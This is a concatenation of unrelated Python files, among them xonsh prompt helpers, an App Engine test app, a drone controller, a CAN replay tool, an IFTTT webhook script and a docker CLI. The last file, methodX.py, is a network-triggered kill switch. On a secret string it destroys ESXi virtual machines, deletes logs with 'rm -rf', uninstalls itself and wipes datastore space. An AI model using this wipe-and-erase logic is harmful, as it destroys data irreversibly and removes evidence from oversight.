if not os.path.isdir(_curpwd):
return False
try:
dot_hg_is_in_curwd = any([b.name == ".hg" for b in xt.scandir(_curpwd)])
except OSError:
return False
if dot_hg_is_in_curwd:
q.put(_curpwd)
break
else:
_oldpwd = _curpwd
_curpwd = os.path.split(_curpwd)[0]
if _oldpwd == _curpwd:
return False
def get_hg_branch(root=None):
"""Try to get the mercurial branch of the current directory,
return None if not in a repo or subprocess.TimeoutExpired if timed out.
"""
env = builtins.__xonsh__.env
timeout = env["VC_BRANCH_TIMEOUT"]
q = queue.Queue()
t = threading.Thread(target=_get_hg_root, args=(q,))
t.start()
t.join(timeout=timeout)
try:
root = pathlib.Path(q.get_nowait())
except queue.Empty:
return None
if env.get("VC_HG_SHOW_BRANCH"):
# get branch name
branch_path = root / ".hg" / "branch"
if branch_path.exists():
with open(branch_path, "r") as branch_file:
branch = branch_file.read().strip()
else:
branch = "default"
else:
branch = ""
# add activated bookmark and topic
for filename in ["bookmarks.current", "topic"]:
feature_branch_path = root / ".hg" / filename
if feature_branch_path.exists():
with open(feature_branch_path) as file:
feature_branch = file.read().strip()
if feature_branch:
if branch:
if filename == "topic":
branch = f"{branch}/{feature_branch}"
else:
branch = f"{branch}, {feature_branch}"
else:
branch = feature_branch
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh__.env["SUPPRESS_BRANCH_TIMEOUT_MESSAGE"]
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print(
"xonsh: branch timeout: computing the branch name, color, or both "
"timed out while formatting the prompt. You may avoid this by "
"increasing the value of $VC_BRANCH_TIMEOUT or by removing branch "
"fields, like {curr_branch}, from your $PROMPT. See the FAQ "
"for more details. This message will be suppressed for the remainder "
"of this session. To suppress this message permanently, set "
"$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.",
file=sys.stderr,
)
def _vc_has(binary):
""" This allows us to locate binaries after git only if necessary """
cmds = builtins.__xonsh__.commands_cache
if cmds.is_empty():
return bool(cmds.locate_binary(binary, ignore_alias=True))
else:
return bool(cmds.lazy_locate_binary(binary, ignore_alias=True))
def current_branch():
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
branch = None
if _vc_has("git"):
branch = get_git_branch()
if not branch and _vc_has("hg"):
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = "<branch-timeout>"
_first_branch_timeout_message()
return branch or None
def _git_dirty_working_directory(q, include_untracked):
denv = builtins.__xonsh__.env.detype()
try:
# Borrowed from this conversation
# https://github.com/sindresorhus/pure/issues/115
if include_untracked:
cmd = [
"git",
"status",
"--porcelain",
"--quiet",
"--untracked-files=normal",
]
else:
unindexed = ["git", "diff", "--no-ext-diff", "--quiet"]
indexed = unindexed + ["--cached", "HEAD"]
cmd = unindexed + ["||"] + indexed
child = subprocess.run(cmd, stderr=subprocess.DEVNULL, env=denv)
# "--quiet" git commands imply "--exit-code", which returns:
# 1 if there are differences
# 0 if there are no differences
dwd = bool(child.returncode)
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
q.put(dwd)
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(
target=_git_dirty_working_directory, args=(q, include_untracked)
)
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be determined, None is returned.
"""
env = builtins.__xonsh__.env
cwd = env["PWD"]
denv = env.detype()
vcbt = env["VC_BRANCH_TIMEOUT"]
# Override user configurations settings and aliases
denv["HGRCPATH"] = ""
try:
s = subprocess.check_output(
["hg", "identify", "--id"],
stderr=subprocess.PIPE,
cwd=cwd,
timeout=vcbt,
universal_newlines=True,
env=denv,
)
return s.strip(os.linesep).endswith("+")
except (
subprocess.CalledProcessError,
subprocess.TimeoutExpired,
FileNotFoundError,
):
return None
def dirty_working_directory():
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
if _vc_has("git"):
dwd = git_dirty_working_directory()
if dwd is None and _vc_has("hg"):
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BOLD_INTENSE_YELLOW}"
elif dwd:
color = "{BOLD_INTENSE_RED}"
else:
color = "{BOLD_INTENSE_GREEN}"
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BACKGROUND_YELLOW}"
elif dwd:
color = "{BACKGROUND_RED}"
else:
color = "{BACKGROUND_GREEN}"
return color
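# In xonsh these helpers back prompt fields such as {curr_branch} (the field the
# timeout message above refers to) and the colour fields derived from
# branch_color()/branch_bg_color(); a prompt fragment along the lines of
# '{branch_color}{curr_branch}' renders the branch name coloured by dirtiness.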
|
services_test_app.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""App that tests api server to see if services are connected.
Each endpoint tests a different service and responds with 200
if it is working, and 500 if any exception is raised.
"""
# This file conforms to the external style guide
# pylint: disable=bad-indentation
import sys
import logging
import socket
import threading
import webapp2
from google.appengine.api import memcache
from google.appengine.api.logservice import logservice
from google.appengine.ext import ndb
def respond_with_error(func):
"""Wraps func so that it writes all Exceptions to response."""
def get_func(self):
"""Handle a get request respond with 500 status code on error."""
try:
func(self)
except Exception as excep: # pylint: disable=broad-except
self.response.set_status(500)
self.response.write(str(excep))
return get_func
# pylint: disable=no-member
class Message(ndb.Model): # pylint: disable=too-few-public-methods
"""Models a simple message."""
content = ndb.StringProperty()
# pylint: disable=no-self-use
class DataStoreTest(webapp2.RequestHandler):
"""Test that the datastore is connected."""
@respond_with_error
def get(self):
"""Ensure that the datastore works."""
Message(content='Hi', parent=ndb.Key(Message, 'test')).put()
msg = Message.query(ancestor=ndb.Key(Message, 'test')).get()
assert msg.content == 'Hi', ('\"%s\" is not \"%s\"' %
(msg.content, 'Hi'))
class LoggingTest(webapp2.RequestHandler):
"""Test that logservice is connected."""
@respond_with_error
def get(self):
"""Ensure that the log service works."""
logservice.write('Hi')
logservice.flush()
class MemcacheTest(webapp2.RequestHandler):
"""Test that memcache is connected."""
@respond_with_error
def get(self):
"""Ensure that memcache works."""
memcache.set('test', 'hi')
assert memcache.get('test') == 'hi', 'Memcache failure'
def socket_thread():
# Function that runs a little server on port 1000 that just echoes back
# the first chunk of data that it receives.
logging.info('In socket thread')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.bind(('', 1000))
s.listen(5)
while True:
c, addr = s.accept()
data = c.recv(1024)
c.send(data)
c.close()
class OpenPort(webapp2.RequestHandler):
"""Open port 1000."""
def get(self):
logging.info('Starting socket thread')
threading.Thread(target=socket_thread).start()
self.content_type = 'text/plain'
self.response.write('started thread.')
# pylint: disable=invalid-name
urls = [('/datastore', DataStoreTest),
('/logging', LoggingTest),
('/memcache', MemcacheTest),
('/openport', OpenPort)]
app = webapp2.WSGIApplication(urls, debug=True)
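# Once the app is served (e.g. under the App Engine dev server), a GET to
# /datastore, /logging or /memcache returns an empty 200 body when the
# corresponding service call works; on failure respond_with_error turns the
# exception text into a 500 response. /openport instead spawns the echo-server
# thread listening on port 1000.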
|
simplecontroller.py
|
from gui.pyevents import PyEvents
from gui.simplegui import SimpleGUI
from .controller import Controller
from drone import Tello
import pygame
import threading
import time
class SimpleController(Controller):
UP_DIR = "up"
DOWN_DIR = "down"
LEFT_DIR = "left"
RIGHT_DIR = "right"
W_DIR = "w"
S_DIR = "s"
A_DIR = "a"
D_DIR = "d"
def __init__(self, tello: Tello, gui: PyEvents):
super(SimpleController, self).__init__(tello)
self.speed = 50
self.send_rc_control = False
self.keys = {
self.UP_DIR: False,
self.DOWN_DIR: False,
self.LEFT_DIR: False,
self.RIGHT_DIR: False,
self.W_DIR: False,
self.S_DIR: False,
self.A_DIR: False,
self.D_DIR: False
}
gui.subscribe_keydown(self.pitchEvents(self.UP_DIR, True), pygame.K_UP)
gui.subscribe_keydown(self.pitchEvents(self.DOWN_DIR, True), pygame.K_DOWN)
gui.subscribe_keydown(self.rollEvents(self.RIGHT_DIR, True), pygame.K_RIGHT)
gui.subscribe_keydown(self.rollEvents(self.LEFT_DIR, True), pygame.K_LEFT)
gui.subscribe_keydown(self.thrustEvents(self.W_DIR, True), pygame.K_w)
gui.subscribe_keydown(self.thrustEvents(self.S_DIR, True), pygame.K_s)
gui.subscribe_keydown(self.yawEvents(self.A_DIR, True), pygame.K_a)
gui.subscribe_keydown(self.yawEvents(self.D_DIR, True), pygame.K_d)
gui.subscribe_keyup(self.pitchEvents(self.UP_DIR, False), pygame.K_UP)
gui.subscribe_keyup(self.pitchEvents(self.DOWN_DIR, False), pygame.K_DOWN)
gui.subscribe_keyup(self.rollEvents(self.RIGHT_DIR, False), pygame.K_RIGHT)
gui.subscribe_keyup(self.rollEvents(self.LEFT_DIR, False), pygame.K_LEFT)
gui.subscribe_keyup(self.thrustEvents(self.W_DIR, False), pygame.K_w)
gui.subscribe_keyup(self.thrustEvents(self.S_DIR, False), pygame.K_s)
gui.subscribe_keyup(self.yawEvents(self.A_DIR, False), pygame.K_a)
gui.subscribe_keyup(self.yawEvents(self.D_DIR, False), pygame.K_d)
gui.subscribe_keyup(self.takeoff, pygame.K_t)
gui.subscribe_keyup(self.land, pygame.K_l)
gui.subscribe_destructor(self.destruct)
# update_thread = threading.Thread(target=self.update, args=())
# update_thread.Daemon = True
# update_thread.start()
def pitchEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setPitch((self.keys[self.UP_DIR] - self.keys[self.DOWN_DIR]) * self.speed)
return eventFunc
def rollEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setRoll((self.keys[self.RIGHT_DIR] - self.keys[self.LEFT_DIR]) * self.speed)
return eventFunc
def thrustEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setThrust((self.keys[self.W_DIR] - self.keys[self.S_DIR]) * self.speed)
return eventFunc
def yawEvents(self, key, val):
def eventFunc():
self.keys[key] = val
self.setYaw((self.keys[self.D_DIR] - self.keys[self.A_DIR]) * self.speed)
return eventFunc
|
can_replay.py
|
#!/usr/bin/env python3
import os
import time
import threading
from tqdm import tqdm
os.environ['FILEREADER_CACHE'] = '1'
from common.basedir import BASEDIR
from common.realtime import config_realtime_process, Ratekeeper, DT_CTRL
from selfdrive.boardd.boardd import can_capnp_to_can_list
from tools.lib.logreader import LogReader
from panda import Panda
try:
from panda_jungle import PandaJungle # pylint: disable=import-error
except Exception:
PandaJungle = None # type: ignore
def send_thread(s, flock):
if "Jungle" in str(type(s)):
if "FLASH" in os.environ:
with flock:
s.flash()
for i in [0, 1, 2, 3, 0xFFFF]:
s.can_clear(i)
s.set_ignition(False)
time.sleep(5)
s.set_ignition(True)
s.set_panda_power(True)
else:
s.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
s.set_can_loopback(False)
idx = 0
ign = True
rk = Ratekeeper(1 / DT_CTRL, print_delay_threshold=None)
while True:
# handle ignition cycling
if ENABLE_IGN:
i = (rk.frame*DT_CTRL) % (IGN_ON + IGN_OFF) < IGN_ON
if i != ign:
ign = i
s.set_ignition(ign)
snd = CAN_MSGS[idx]
snd = list(filter(lambda x: x[-1] <= 2, snd))
s.can_send_many(snd)
idx = (idx + 1) % len(CAN_MSGS)
# Drain panda message buffer
s.can_recv()
rk.keep_time()
def connect():
config_realtime_process(3, 55)
serials = {}
flashing_lock = threading.Lock()
while True:
# look for new devices
for p in [Panda, PandaJungle]:
if p is None:
continue
for s in p.list():
if s not in serials:
print("starting send thread for", s)
serials[s] = threading.Thread(target=send_thread, args=(p(s), flashing_lock))
serials[s].start()
# try to join all send threads
cur_serials = serials.copy()
for s, t in cur_serials.items():
t.join(0.01)
if not t.is_alive():
del serials[s]
time.sleep(1)
if __name__ == "__main__":
if PandaJungle is None:
print("\33[31m", "WARNING: cannot connect to jungles. Clone the jungle library to enable support:", "\033[0m") # type: ignore
print("\033[34m", f"cd {BASEDIR} && git clone https://github.com/commaai/panda_jungle", "\033[0m")
print("Loading log...")
ROUTE = "77611a1fac303767/2020-03-24--09-50-38"
REPLAY_SEGS = list(range(10, 16)) # route has 82 segments available
CAN_MSGS = []
for i in tqdm(REPLAY_SEGS):
log_url = f"https://commadataci.blob.core.windows.net/openpilotci/{ROUTE}/{i}/rlog.bz2"
lr = LogReader(log_url)
CAN_MSGS += [can_capnp_to_can_list(m.can) for m in lr if m.which() == 'can']
# set both to cycle ignition
IGN_ON = int(os.getenv("ON", "0"))
IGN_OFF = int(os.getenv("OFF", "0"))
ENABLE_IGN = IGN_ON > 0 and IGN_OFF > 0
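# e.g. `ON=5 OFF=5 ./can_replay.py` cycles ignition 5s on / 5s off during replay;
# leaving either at 0 (the default) disables cycling. Setting FLASH=1 also
# reflashes any attached panda jungle before the replay starts.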
if ENABLE_IGN:
print(f"Cycling ignition: on for {IGN_ON}s, off for {IGN_OFF}s")
connect()
|
webhook.py
|
'''
webhook.py
pj@mrpjevans.com
Create a WebHook at ifttt.com to do, well, whatever you want! Maybe send
an email to begin with. You'll give it a trigger name which is used to
create a URL something like the following:
https://maker.ifttt.com/trigger/{trigger_name}/with/key/{your_key}
Replace those two values in {} and go to the URL to check it's working.
Once you're happy, change WEBHOOK below to match. Run the script. Every time
the light is switched on, your WebHook is called.
Make sure you update the IP address to match your gateway's and
run $ python3 -i -m pytradfri IP to (re)create your
tradfri_standalone_psk.conf (Credentials file)
'''
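# For example (with a hypothetical trigger called 'light_on'), the finished URL
# looks like https://maker.ifttt.com/trigger/light_on/with/key/<your_key>, and
# you can smoke-test it from a shell before wiring it in here:
#   curl -X POST https://maker.ifttt.com/trigger/light_on/with/key/<your_key>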
from pytradfri import Gateway
from pytradfri.api.libcoap_api import APIFactory
from pytradfri.util import load_json, save_json
from time import sleep
import urllib.request
import urllib.parse
import threading
# Change this IP address to your gateway
IP_ADDRESS = '192.168.0.158'
# Make sure you're in the same directory as this file
CONFIG_FILE = 'tradfri_standalone_psk.conf'
WEBHOOK = 'https://maker.ifttt.com/trigger/{trigger_name}/with/key/{your_key}'
values = {}
values['value1'] = 'Value 1'
values['value2'] = 'Next value'
values['value3'] = 'Last one'
data = urllib.parse.urlencode(values)
data = data.encode('ascii')
# Load in the file, get our password for the gateway and create an API
conf = load_json(CONFIG_FILE)
identity = conf[IP_ADDRESS].get('identity')
psk = conf[IP_ADDRESS].get('key')
api_factory = APIFactory(host=IP_ADDRESS, psk_id=identity, psk=psk)
# This section connects to the gateway and gets information on devices
api = api_factory.request
gateway = Gateway()
devices_command = gateway.get_devices()
devices_commands = api(devices_command)
devices = api(devices_commands)
# Create an array of objects that are lights
lights = [dev for dev in devices if dev.has_light_control]
def observe(api, device):
def callback(updated_device):
light = updated_device.light_control.lights[0]
if (light.state):
# Light has been switched on
print('Light on! Calling WebHook...')
req = urllib.request.Request(WEBHOOK, data)
urllib.request.urlopen(req)
else:
print('Light off')
def err_callback(err):
print(err)
def worker():
api(device.observe(callback, err_callback, duration=120))
threading.Thread(target=worker, daemon=True).start()
print('Sleeping to start observation task')
sleep(1)
observe(api, lights[0])
while(True):
sleep(0.01)
|
cli.py
|
''' CLI entry point for the knot '''
import os
import click
import threading
from knot import config
from knot.lib import detect_server
@click.group()
def main():
'''display help'''
@main.command()
def build():
'''executes predefined docker build command'''
os.chdir(config.project_path('..'))
ext = 'bat' if os.name == 'nt' else 'sh'
os.system(f'docker_build.{ext}')
@main.command()
def run():
'''executes predefined docker run command'''
os.chdir(config.project_path('..'))
thread = threading.Thread(target=detect_server, args=([5001],))
thread.start()
ext = 'bat' if os.name == 'nt' else 'sh'
os.system(f'docker_run.{ext}')
@main.command()
def start():
'''starts web ui'''
os.chdir(config.project_path('web'))
os.system('python app.py')
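# Typical invocations, assuming this group is exposed as a `knot` console script:
#   knot build   # runs docker_build.sh (or .bat on Windows) from the project root
#   knot run     # spawns detect_server([5001]) in a thread, then runs docker_run.sh/.bat
#   knot start   # launches the web UI via `python app.py` in the web/ directory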
|
methodX.py
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
import sys
import esxi
import threading
import subprocess
import sms
from settings import Settings
from cleaner import cleanDiskSpace
from socketserver import *
import time
datastores = esxi.datastoresPath()
if len(datastores) > 0:
settings = Settings(datastores[0])
else:
raise Exception("No datastore found")
lock = threading.Lock()
class methodXServerHandler(StreamRequestHandler):
def handle(self):
self.data = self.request.recv(1024)
if lock.acquire(False):
try:
data = self.data.decode().replace("\r","").replace("\n","")
if data == settings.Secret:
self.request.sendall(b'Ok secret. Starting destroy VMs')
sms.send(settings.Phones)
handleVMs(destroyVM)
time.sleep(5)
subprocess.call(["rm", "-rf", "/scratch/vmware/../log/*"], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
subprocess.call(["rm", "-rf", settings.Path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(["esxcli", "software", "vib", "remove", "-n", "methodX", "--no-live-install"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
threadList = []
for datastorePath in datastores:
thread = threading.Thread(target = cleanDiskSpace, args = (datastorePath + "/",))
threadList.append(thread)
thread.start()
for thread in threadList:
thread.join()
self.request.sendall(b'Done')
elif data == settings.TestSecret:
sms.send(settings.Phones)
handleVMs(shutdownVM)
self.request.sendall(b'Done')
elif data == "TestConnect":
self.request.sendall(b'Connect OK')
self.request.sendall(b'Done')
except Exception as e:
self.request.sendall(bytes(str(e), "utf-8"))
finally:
lock.release()
else:
self.request.sendall(b'Process already started ...')
def handleVMs(vmHandleFunc):
cluster = esxi.connect()
for ipAddress in settings.VMS:
vmDescription = esxi.getVmDescriprionByIp(cluster, ipAddress)
if vmDescription != None:
vmHandleFunc(vmDescription)
def destroyVM(vmDescription: dict):
if (vmDescription["poweredOn"]):
esxi.powerOff(vmDescription["vmId"])
time.sleep(1)
esxi.destroy(vmDescription["vmId"])
def shutdownVM(vmDescription: dict):
if (vmDescription["poweredOn"]):
esxi.shutdown(vmDescription["vmId"])
if __name__ == "__main__":
server = TCPServer(("0.0.0.0", settings.Port), methodXServerHandler)
try:
settings.Check()
server.serve_forever()
except Exception as e:
print("Error: %s" % e)
finally:
server.server_close()
|